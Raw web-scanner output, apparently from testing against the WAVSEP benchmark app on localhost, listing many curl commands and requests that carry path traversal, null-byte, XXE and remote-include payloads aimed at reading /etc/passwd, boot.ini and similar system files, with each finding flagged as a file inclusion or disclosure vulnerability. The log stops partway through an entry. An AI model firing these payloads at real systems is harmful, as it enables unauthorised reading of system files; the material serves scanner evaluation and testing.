GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.php HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.php"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.asp HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.asp"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.aspx HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.aspx"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.css HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.css"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.htm HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.htm"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.html HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.html"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.php HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.php"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.asp HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.asp"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.aspx HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.aspx"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.css HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.css"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00pix.gif HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00pix.gif"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.htm HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.htm"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.html HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.html"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.php HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.php"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.asp HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.asp"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.aspx HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.aspx"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.css HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.css"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00pix.gix HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00pix.gix"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2Fc%3A%2Fboot.ini%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2Fc%3A%2Fboot.ini%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp

Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=file%3A%2F%2Fc%3A%5C%5Cboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=file%3A%2F%2Fc%3A%5C%5Cboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.htm HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.htm"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.html HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.html"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.php HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.php"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.asp HTTP/1.1
Host: 127.0.0.1:8090
